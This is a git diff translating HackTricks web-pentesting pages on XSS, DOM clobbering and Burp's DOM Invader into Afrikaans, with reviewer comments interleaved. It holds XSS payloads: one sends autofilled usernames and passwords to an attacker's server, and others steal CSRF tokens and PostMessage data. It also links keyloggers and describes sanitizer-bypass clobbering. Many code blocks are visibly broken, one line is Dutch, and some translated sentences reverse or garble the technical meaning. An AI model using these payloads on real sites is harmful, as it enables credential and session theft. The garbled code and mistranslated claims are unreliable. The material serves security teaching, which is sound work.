deur 'n "200 OK" antwoord terug te stuur, weet die aanvaller dat die poort oop is. 
```python var ports = [80, 443, 445, 554, 3306, 3690, 1234]; for(var i=0; i::placeholder { color:white; } ``` +### Opname van outomatiese invul wagwoorde -### Auto-fill passwords capture +Auto-fill passwords is 'n handige funksie wat deur baie webblaaierplatforms aangebied word. Dit stel gebruikers in staat om wagwoorde outomaties in te vul wanneer hulle aanmeld by 'n webwerf. Hierdie funksie kan egter 'n veiligheidsrisiko inhou, veral as dit gekombineer word met 'n XSS-aanval (Cross-Site Scripting). +Met 'n XSS-aanval kan 'n aanvaller skadelike kode insluit in 'n webwerf se invoerveld. As 'n gebruiker dan die webwerf besoek en die invoerveld gebruik, sal die skadelike kode uitgevoer word. As die webwerf 'n outomatiese invul wagwoordfunksie het, kan die aanvaller die wagwoord van die gebruiker onderskep en dit na 'n eksterne bediener stuur. + +Om outomatiese invul wagwoorde te onderskep, kan 'n aanvaller gebruik maak van verskillende tegnieke, soos die insluiting van 'n skadelike skripsie in 'n webwerf se invoerveld of die gebruik van 'n skadelike URL wat die wagwoord onderskep wanneer dit outomaties ingevul word. + +Dit is belangrik vir webwerfontwikkelaars om bewus te wees van hierdie risiko en om gepaste maatreëls te tref om dit te voorkom. Dit kan insluit die korrekte hantering van gebruikersinsette, die gebruik van beveiligingsmaatreëls soos inhoudsbeveiligingsbeleide (Content Security Policy) en die deaktivering van outomatiese invul wagwoorde. + +Gebruikers kan ook hulself beskerm teen hierdie tipe aanvalle deur nie outomatiese invul wagwoorde te gebruik nie en deur bewus te wees van die risiko's van XSS-aanvalle. Dit sluit in om nie op verdagte skakels te klik nie en om slegs vertroude webwerwe te besoek. + +As 'n pentester is dit belangrik om bewus te wees van hierdie tegniek en om dit te gebruik om die veiligheid van 'n webwerf te evalueer. ```javascript Username:
@@ -1294,20 +1414,18 @@ mode: 'no-cors', body:username.value+':'+this.value });"> ``` +Wanneer enige data in die wagwoordveld ingevoer word, word die gebruikersnaam en wagwoord na die aanvaller se bediener gestuur, selfs as die klient 'n gestoorde wagwoord kies en niks skryf nie, sal die geloofsbriewe uitgelek word. -When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated. +### Sleutellogger -### Keylogger - -Just searching in github I found a few different ones: +Deur net op GitHub te soek, het ek 'n paar verskillende eenhede gevind: * [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger) * [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger) * [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger) -* You can also use metasploit `http_javascript_keylogger` - -### Stealing CSRF tokens +* Jy kan ook metasploit gebruik `http_javascript_keylogger` +### Steel CSRF-tokens ```javascript ``` +### Steel PostMessage-boodskappe -### Stealing PostMessage messages +PostMessage is 'n API wat gebruik word om boodskappe tussen vensters te stuur in 'n webtoepassing. Dit kan egter ook misbruik word deur 'n aanvaller om boodskappe te steel wat tussen vensters gestuur word. +#### Hoe werk dit? + +Wanneer 'n webtoepassing PostMessage gebruik om 'n boodskap na 'n ander venster te stuur, word die boodskap as 'n objek gestruktureer en deur die `postMessage`-funksie gestuur. Die ontvangende venster kan dan die boodskap onderskep en die inhoud daarvan gebruik. + +'n Aanvaller kan hierdie funksionaliteit misbruik deur 'n kwaadwillige webtoepassing te skep wat 'n venster oopmaak en 'n PostMessage-boodskap stuur na 'n ander venster wat die aanvaller wil teiken. 
As die aanvaller die boodskap kan onderskep, kan hy die inhoud daarvan steel en dit vir sy eie voordeel gebruik. + +#### Hoe om PostMessage-diefstal te voorkom? + +Om PostMessage-diefstal te voorkom, moet die volgende maatreëls in ag geneem word: + +1. Vertrou nie blindeel vensters nie: Moenie blindeel vensters oopmaak en PostMessage-boodskappe stuur sonder om die inhoud van die venster te verifieer nie. Dit kan aanvallers die geleentheid bied om boodskappe te steel. + +2. Verifieer die oorsprong van die venster: Voordat 'n PostMessage-boodskap aan 'n ander venster gestuur word, moet die oorsprong van die venster geverifieer word. Dit kan gedoen word deur die `origin`-parameter van die `postMessage`-funksie te gebruik. + +3. Gebruik 'n veilige kommunikasiekanale: As die PostMessage-boodskap gevoelige inligting bevat, moet 'n veilige kommunikasiekanale, soos HTTPS, gebruik word om die boodskap te stuur. Dit sal die risiko van inligtingsoortdring verminder. + +Deur hierdie maatreëls te volg, kan die risiko van PostMessage-diefstal verminder word en kan die veiligheid van webtoepassings verbeter word. ```markup ``` - -### Abusing Service Workers +### Misbruik van dienswerkers {% content-ref url="abusing-service-workers.md" %} [abusing-service-workers.md](abusing-service-workers.md) {% endcontent-ref %} -### Accessing Shadow DOM +### Toegang tot Shadow DOM {% content-ref url="shadow-dom.md" %} [shadow-dom.md](shadow-dom.md) @@ -1349,10 +1484,9 @@ function handleResponse() { {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %} -### Blind XSS payloads - -You can also use: [https://xsshunter.com/](https://xsshunter.com) +### Blinde XSS-payloads +Jy kan ook gebruik maak van: [https://xsshunter.com/](https://xsshunter.com) ```markup "> "> 
@@ -1363,7 +1497,7 @@ You can also use: [https://xsshunter.com/](https://xsshunter.com) "> -"> ``` - {% hint style="warning" %} -The style tag is used to **give enough time to the iframe to render**. Without it you will find an alert of **undefined**. +Die style-etiket word gebruik om genoeg tyd te gee vir die iframe om te render. Sonder dit sal jy 'n waarskuwing van 'undefined' kry. {% endhint %} -To clobber deeper attributes, you can use **iframes with html encoding** this way: - +Om dieper eienskappe te oorskryf, kan jy iframes met HTML-kodering gebruik op die volgende manier: ```html @@ -76,11 +65,9 @@ To clobber deeper attributes, you can use **iframes with html encoding** this wa alert(a.b.c.d.e)//controlled ``` - ### **Filter Bypassing** -If a filter is **looping** through the **properties** of a node using something like `document.getElementByID('x').attributes` you could **clobber** the attribute **`.attributes`** and **break the filter**. Other DOM properties like **`tagName`** , **`nodeName`** or **`parentNode`** and more are also **clobberable**. - +As 'n filter deur die **eienskappe** van 'n nodus **loop** deur iets soos `document.getElementByID('x').attributes`, kan jy die eienskap **`.attributes`** **oorheers** en die filter **breek**. Ander DOM-eienskappe soos **`tagName`**, **`nodeName`** of **`parentNode`** en meer is ook **oorheersbaar**. ```html
@@ -91,56 +78,48 @@ console.log(document.getElementById('x').nodeName)//FORM console.log(document.getElementById('y').nodeName)//[object HTMLInputElement] ``` - ## **Clobbering `window.someObject`** -In JavaScript it's common to find: - +In JavaScript is dit algemeen om te vind: ```javascript var someObject = window.someObject || {}; ``` - -Manipulating HTML on the page allows overriding `someObject` with a DOM node, potentially introducing security vulnerabilities. For example, you can replace `someObject` with an anchor element pointing to a malicious script: - +Die manipulasie van HTML op die bladsy maak dit moontlik om `someObject` te oorskryf met 'n DOM-node, wat potensiële sekuriteitskwessies kan veroorsaak. Byvoorbeeld, jy kan `someObject` vervang met 'n anker-element wat na 'n skadelike skrips verwys: ```html ``` - -In a vulnerable code such as: - +In 'n kwesbare kode soos: ```html ``` +Hierdie metode maak gebruik van die skripsbron om ongewenste kode uit te voer. -This method exploits the script source to execute unwanted code. +**Truuk**: **`DOMPurify`** stel jou in staat om die **`cid:`** protokol te gebruik, wat **dubbele aanhalingstekens nie URL-kodeer nie**. Dit beteken dat jy 'n gekodeerde dubbele aanhalingsteken kan inspuit wat tydens uitvoering gedekodeer sal word. Daarom sal die inspuiting van iets soos **``** die HTML-gekodeerde `"` **tydens uitvoering gedekodeer** en **ontsnap** uit die attribuutwaarde om die **`onerror`** gebeurtenis te **skep**. -**Trick**: **`DOMPurify`** allows you to use the **`cid:`** protocol, which **does not URL-encode double-quotes**. This means you can **inject an encoded double-quote that will be decoded at runtime**. Therefore, injecting something like **``** will make the HTML encoded `"` to be **decoded on runtime** and **escape** from the attribute value to **create** the **`onerror`** event. +'n Ander tegniek maak gebruik van 'n **`form`** element. 
Sekere kliëntkant-biblioteke ondersoek die eienskappe van 'n nuut geskepte vormelement om dit skoon te maak. Deur egter 'n `input` met `id=attributes` binne die vorm by te voeg, oorskryf jy effektief die eienskappe-eienskap en voorkom dat die sanitiseerder toegang tot die werklike eienskappe verkry. -Another technique uses a **`form`** element. Certain client-side libraries inspect the attributes of a newly created form element to clean them. However, by adding an `input` with `id=attributes` inside the form, you effectively overwrite the attributes property, preventing the sanitizer from accessing the actual attributes. +Jy kan 'n voorbeeld van hierdie tipe oorskrywing in hierdie CTF-verslag [**vind**](iframes-in-xss-and-csp.md#iframes-in-sop-2). -You can [**find an example of this type of clobbering in this CTF writeup**](iframes-in-xss-and-csp.md#iframes-in-sop-2). +## Oorskryf van die dokumentobjek -## Clobbering document object +Volgens die dokumentasie is dit moontlik om eienskappe van die dokumentobjek te oorskryf deur gebruik te maak van DOM-oorskrywing: -According to the documentation it's possible to overwrite attributes of the document object using DOM Clobbering: - -> The [Document](https://html.spec.whatwg.org/multipage/dom.html#document) interface [supports named properties](https://webidl.spec.whatwg.org/#dfn-support-named-properties). 
The [supported property names](https://webidl.spec.whatwg.org/#dfn-supported-property-names) of a [Document](https://html.spec.whatwg.org/multipage/dom.html#document) object document at any moment consist of the following, in [tree order](https://dom.spec.whatwg.org/#concept-tree-order) according to the element that contributed them, ignoring later duplicates, and with values from [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) attributes coming before values from name attributes when the same element contributes both: +> Die [Document](https://html.spec.whatwg.org/multipage/dom.html#document) koppelvlak [ondersteun genoemde eienskappe](https://webidl.spec.whatwg.org/#dfn-support-named-properties). Die [ondersteunde eienskapsname](https://webidl.spec.whatwg.org/#dfn-supported-property-names) van 'n [Document](https://html.spec.whatwg.org/multipage/dom.html#document)-objektdokument op enige oomblik bestaan uit die volgende, in [boomvolgorde](https://dom.spec.whatwg.org/#concept-tree-order) volgens die element wat dit bydra, waarby latere duplikate geïgnoreer word, en met waardes van [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-eienskappe wat voor waardes van naam-eienskappe kom wanneer dieselfde element beide bydra: > -> \- The value of the name content attribute for all [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), and [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty name content attribute and are [in a document 
tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);\ +> \- Die waarde van die naam-inhoudseienskap vir alle [blootgestelde](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), en [blootgestelde](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element)-elemente wat 'n nie-leë naam-inhoudseienskap het en [in 'n dokumentboom](https://dom.spec.whatwg.org/#in-a-document-tree) met die dokument as hul [wortel](https://dom.spec.whatwg.org/#concept-tree-root) is;\ > \ -> \- The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);\ +> \- Die waarde van die [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-inhoudseienskap vir alle [blootgestelde](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element)-elemente wat 'n nie-leë [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-inhoudseienskap het en [in 'n 
dokumentboom](https://dom.spec.whatwg.org/#in-a-document-tree) met die dokument as hul [wortel](https://dom.spec.whatwg.org/#concept-tree-root) is;\ > \ -> \- The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) elements that have both a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and a non-empty name content attribute, and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root). - -Using this technique you can overwrite commonly used **values such as `document.cookie`, `document.body`, `document.children`**, and even methods in the Document interface like `document.querySelector`. +> \- Die waarde van die [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-inhoudseienskap vir alle [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element)-elemente wat beide 'n nie-leë [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-inhoudseienskap en 'n nie-leë naam-inhoudseienskap het, en [in 'n dokumentboom](https://dom.spec.whatwg.org/#in-a-document-tree) met die dokument as hul [wortel](https://dom.spec.whatwg.org/#concept-tree-root) is. +Met behulp van hierdie tegniek kan jy algemeen gebruikte **waardes soos `document.cookie`, `document.body`, `document.children`** en selfs metodes in die Document-koppelvlak soos `document.querySelector` oorskryf. ```javascript document.write("") 
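Review bot: in the `window.someObject` hunk (@@ -91,56 +78,48 @@) the CTF link text shrinks from the whole phrase to a single word, `[**vind**]`, which is poor anchor text; keep the full sentence inside the link as the original did. The WHATWG blockquote is a verbatim spec citation, and translating it turns a quotation into a paraphrase: 'Document object document' (a Document object called `document`) has become ''n Document-objektdokument', which misreads the spec. Either leave the quoted block in English or translate it so that `document` stays a code identifier. The heading `## **Clobbering \`window.someObject\`**` also remains English context while its sibling headings are translated.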
@@ -159,11 +138,9 @@ HTMLCollection(2) [img, form, cookie: img] typeof(document.cookie) 'object ``` +## Skryf nadat die element oorskryf is -## Writing after the element clobbered - -The results of calls to **`document.getElementById()`** and **`document.querySelector()`** can be altered by injecting a `` or `` tag with an identical id attribute. Here's how it can be done: - +Die resultate van oproepe na **`document.getElementById()`** en **`document.querySelector()`** kan verander word deur 'n `` of `` tag in te spuit met 'n identiese id-eienskap. Hier is hoe dit gedoen kan word: ```html

@@ -173,9 +150,7 @@ alert(document.getElementById('cdnDomain').innerText); // Clobbered alert(document.querySelector('.x').innerText); // Clobbered ``` - -Furthermore, by employing styles to hide these injected HTML/body tags, interference from other text in the `innerText` can be prevented, thus enhancing the efficacy of the attack: - +Verder kan de doeltreffendheid van de aanval worden verbeterd door stijlen te gebruiken om deze ingevoegde HTML/body-tags te verbergen en interferentie van andere tekst in de `innerText` te voorkomen: ```html

existing text

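Review bot: the `+Verder kan de doeltreffendheid van de aanval worden verbeterd ...` line in hunk @@ -173,9 +150,7 @@ is Dutch, not Afrikaans ('de', 'worden', 'stijlen', 'deze ingevoegde', Dutch verb placement). In a commit titled 'Translated to Afrikaans' this line needs re-translating, e.g. `+Verder kan die doeltreffendheid van die aanval verbeter word deur style te gebruik om hierdie ingespuite HTML/body-etikette te versteek en steuring deur ander teks in die `innerText` te voorkom:`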
@@ -187,9 +162,7 @@ p{display:none;} alert(document.getElementById('cdnDomain').innerText); // Clobbered ``` - -Investigations into SVG revealed that a `` tag can also be utilized effectively: - +Ondersoeke na SVG het aan die lig gebring dat 'n ``-etiket ook doeltreffend gebruik kan word: ```html clobbered @@ -197,9 +170,7 @@ Investigations into SVG revealed that a `` tag can also be utilized effect alert(document.getElementById('cdnDomain').innerText); // Clobbered ``` - -For the HTML tag to function within SVG in browsers like Chrome and Firefox, a `` tag is necessary: - +Vir die HTML-etiket om binne SVG te funksioneer in webblaaier soos Chrome en Firefox, is 'n ``-etiket nodig: ```html @@ -211,11 +182,9 @@ For the HTML tag to function within SVG in browsers like Chrome and Firefox, a ` alert(document.getElementById('cdnDomain').innerText); // Clobbered ``` +## Oorweldiging van Vorms - -## Clobbering Forms - -It's possible to add **new entries inside a form** just by **specifying the `form` attribute** inside some tags. You can use this to **add new values inside a form** and to even add a new **button** to **send it** (clickjacking or abusing some `.click()` JS code): +Dit is moontlik om **nuwe inskrywings binne 'n vorm** by te voeg deur eenvoudig die `form` attribuut te spesifiseer binne sekere etikette. Jy kan dit gebruik om **nuwe waardes binne 'n vorm** by te voeg en selfs 'n nuwe **knoppie** om dit te **stuur** (clickjacking of misbruik van sommige `.click()` JS-kode): {% code overflow="wrap" %} ```html 
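Review bot: 'webblaaier' in the @@ -197,9 +170,7 @@ hunk should be plural ('webblaaiers soos Chrome en Firefox'), and 'Vir die HTML-etiket om binne SVG te funksioneer' is a word-for-word calque of the English; 'Sodat die HTML-etiket binne SVG in webblaaiers soos Chrome en Firefox werk, is 'n ...-etiket nodig' reads naturally.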
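Review bot: `## Oorweldiging van Vorms` in the @@ -211,11 +182,9 @@ hunk mistranslates 'Clobbering Forms': 'oorweldiging' means overwhelming, and the rest of the file uses 'oorskryf' for clobbering (`## Oorskryf van die dokumentobjek`), so this heading should use the same term or keep 'Clobbering'. Capitalising 'Vorms' mid-heading also departs from the sentence case the other translated headings use.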
@@ -229,22 +198,22 @@ Click to send! ``` {% endcode %} -* For more form attributes in [**button check this**](https://www.w3schools.com/tags/tag\_button.asp)**.** +* Vir meer vormatribute in [**knoppie kyk hierdie**](https://www.w3schools.com/tags/tag\_button.asp)**.** -## References +## Verwysings * [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering) * [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering) -* Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker. +* Heyes, Gareth. JavaScript vir hackers: Leer om soos 'n hacker te dink.
-
Learn AWS hacking from zero to hero with
htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md index 22d8071b9..9c94118f8 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-invader.md +++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md @@ -2,96 +2,94 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
## DOM Invader -DOM Invader is a browser tool installed in Burp's inbuilt browser. It assists in **detecting DOM XSS vulnerabilities** using various sources and sinks, including web messages and prototype pollution. The tool is preinstalled as an extension. +DOM Invader is 'n blaaierhulpmiddel wat in Burp se ingeboude blaaier geïnstalleer is. Dit help om **DOM XSS-gebreklikhede** op te spoor deur gebruik te maak van verskillende bronne en sappe, insluitend webboodskappe en prototipevervuiling. Die hulpmiddel is vooraf geïnstalleer as 'n uitbreiding. -DOM Invader integrates a tab within the browser's DevTools panel enabling the following: +DOM Invader integreer 'n oortjie binne die blaaier se DevTools-paneel wat die volgende moontlik maak: -1. **Identification of controllable sinks** on a webpage for DOM XSS testing, providing context and sanitization details. -2. **Logging, editing, and resending web messages** sent via the `postMessage()` method for DOM XSS testing. DOM Invader can also auto-detect vulnerabilities using specially crafted web messages. -3. Detection of **client-side prototype pollution** sources and scanning of controllable gadgets sent to risky sinks. -4. Identification of **DOM clobbering vulnerabilities**. +1. **Identifikasie van beheerbare sappe** op 'n webbladsy vir DOM XSS-toetsing, met konteks- en sanitiseringsbesonderhede. +2. **Log, wysig en herstuur webboodskappe** wat gestuur word via die `postMessage()`-metode vir DOM XSS-toetsing. DOM Invader kan ook outomaties kwesbaarhede opspoor deur spesiaal vervaardigde webboodskappe. +3. Opsoek na **kliëntkant prototipevervuiling**-bronne en skandering van beheerbare gadgets wat na risikovolle sappe gestuur word. +4. Identifikasie van **DOM-oorvleuelingsgebreklikhede**. -### Enable It +### Aktiveer dit -In the Burp's builtin browser go to the **Burp extension** and enable it: +Gaan na die **Burp-uitbreiding** in die ingeboude blaaier en aktiveer dit:
-Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:** +Vernuwe die bladsy en in die **Dev Tools** sal jy die **DOM Invader-oortjie vind:**
-### Inject a Canary +### Voeg 'n Canary in -In the previous image you can see a **random group of chars, that is the Canary**. You should now start **injecting** it in different parts of the web (params, forms, url...) and each time click search it. DOM Invader will check if the **canary ended in any interesting sink** that could be exploited. +In die vorige prent kan jy 'n **willekeurige groep karakters sien, dit is die Canary**. Jy moet dit nou begin **inspuit** in verskillende dele van die web (parameters, vorms, URL...) en elke keer daarop klik om dit te soek. DOM Invader sal nagaan of die **canary in enige interessante sap geëindig het** wat uitgebuit kan word. -Moreover, the options **Inject URL params** and Inject forms will automatically open a **new tab** **injecting** the **canary** in every **URL** param and **form** it finds. +Verder sal die opsies **Inject URL parameters** en **Inject forms** outomaties 'n **nuwe oortjie** oopmaak deur die **canary** in elke **URL-parameter** en **vorm** wat dit vind, in te spuit. -### Inject an empty Canary +### Voeg 'n leë Canary in -If you just want to find potential sinks the page might have, even if they aren't exploitable, you can **search for an empty canary**. +As jy net potensiële sappe wil vind wat die bladsy mag hê, selfs al is hulle nie uitbuitbaar nie, kan jy soek na 'n leë canary. -### Post Messages +### Stuur boodskappe -DOM Invader allows testing for DOM XSS using web messages with features such as: +DOM Invader maak dit moontlik om DOM XSS te toets deur gebruik te maak van webboodskappe met funksies soos: -1. **Logging web messages** sent via `postMessage()`, akin to Burp Proxy's HTTP request/response history logging. -2. **Modification** and **reissue** of web messages to manually test for DOM XSS, similar to Burp Repeater's function. -3. **Automatic alteration** and sending of web messages for probing DOM XSS. +1. 
**Log webboodskappe** wat gestuur word via `postMessage()`, soortgelyk aan Burp Proxy se HTTP-versoek-/reaksiegeskiedenislogboek. +2. **Wysiging** en **heruitreiking** van webboodskappe om handmatig te toets vir DOM XSS, soortgelyk aan Burp Repeater se funksie. +3. **Outomatiese verandering** en stuur van webboodskappe vir die sondering van DOM XSS. -#### Message details +#### Boodskapbesonderhede -Detailed information can be viewed about each message by clicking on it, which includes whether the client-side JavaScript accesses the `origin`, `data`, or `source` properties of the message. +Gedetailleerde inligting oor elke boodskap kan besigtig word deur daarop te klik, wat insluit of die kliëntkant JavaScript die `origin`, `data` of `source` eienskappe van die boodskap benader. -* **`origin`** : If the **origin information of the message is not check**, you may be able to send cross-origin messages to the event handler **from an arbitrary external domain**. But if it's checked it still could be insecure. -* **`data`**: This is where the payload is sent. If this data is not used, the sink is useless. -* **`source`**: Evaluates if the source property, usually referencing an iframe, is validated instead of the origin. Even if this is checked, it doesn't assure the validation can't be bypassed. +* **`origin`**: As die **oorsprongsinligting van die boodskap nie nagegaan word nie**, kan jy dalk kruisoorsprong-boodskappe na die gebeurtenishanterer stuur **vanaf 'n willekeurige eksterne domein**. Maar as dit nagegaan word, kan dit steeds onveilig wees. +* **`data`**: Hierdie is waar die payload gestuur word. As hierdie data nie gebruik word nie, is die sap nutteloos. +* **`source`**: Evalueer of die bron-eienskap, wat gewoonlik na 'n iframe verwys, geverifieer word in plaas van die oorsprong. Selfs as dit nagegaan word, verseker dit nie dat die verifikasie omseil kan word nie. -#### Reply a message +#### Antwoord op 'n boodskap -1. 
From the **Messages** view, click on any message to open the message details dialog. -2. Edit the **Data** field as required. -3. Click **Send**. +1. Klik op enige boodskap in die **Boodskappe**-sig om die besonderhededialoog van die boodskap oop te maak. +2. Wysig die **Data**-veld soos vereis. +3. Klik op **Stuur**. -### Prototype Pollution +### Prototipevervuiling -DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it: +DOM Invader kan ook soek na **Prototipevervuiling-gebreklikhede**. Eerstens moet jy dit aktiveer:
-Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**. - -If anything is found a **Test** button will appear to **test the found source**. Click on it, a new tab will appear, create an object in the console and check if the `testproperty` exists: +Dan sal dit **soek na bronne** wat jou in staat stel om arbitrêre eienskappe by die **`Object.prototype`** te voeg. +As iets gevind word, sal 'n **Toets**-knoppie verskyn om die gevonde bron te **toets**. Klik daarop, 'n nuwe oortjie sal verskyn, skep 'n voorwerp in die konsole en kyk of die `testproperty` bestaan: ```javascript let b = {} b.testproperty ``` +Sodra jy 'n bron gevind het, kan jy **soek vir 'n gadget**: -Once you found a source you can **scan for a gadget**: +1. 'n Nuwe oortjie word deur DOM Invader geopen wanneer die **Soek vir gadgets**-knoppie, wat langs enige geïdentifiseerde prototipevervuilingsbron in die **DOM**-sigbaarheid gevind kan word, gekliek word. Die soektog na geskikte gadgets begin dan. +2. Intussen, in dieselfde oortjie, moet die **DOM Invader**-oortjie in die DevTools-paneel geopen word. Nadat die soektog voltooi is, word enige lekke wat toeganklik is via die geïdentifiseerde gadgets in die **DOM**-sigbaarheid vertoon. Byvoorbeeld, 'n gadget-eienskap genaamd `html` wat aan die `innerHTML`-lek oorgedra word, word in die voorbeeld hieronder getoon. -1. A new tab is opened by DOM Invader when the **Scan for gadgets** button, which can be found next to any identified prototype pollution source in the **DOM** view, is clicked. The scanning for suitable gadgets then begins. -2. Meanwhile, in the same tab, the **DOM Invader** tab should be opened in the DevTools panel. After the scan completes, any sinks accessible via the identified gadgets are displayed in the **DOM** view. For instance, a gadget property named `html` being passed to the `innerHTML` sink is shown in the example below. 
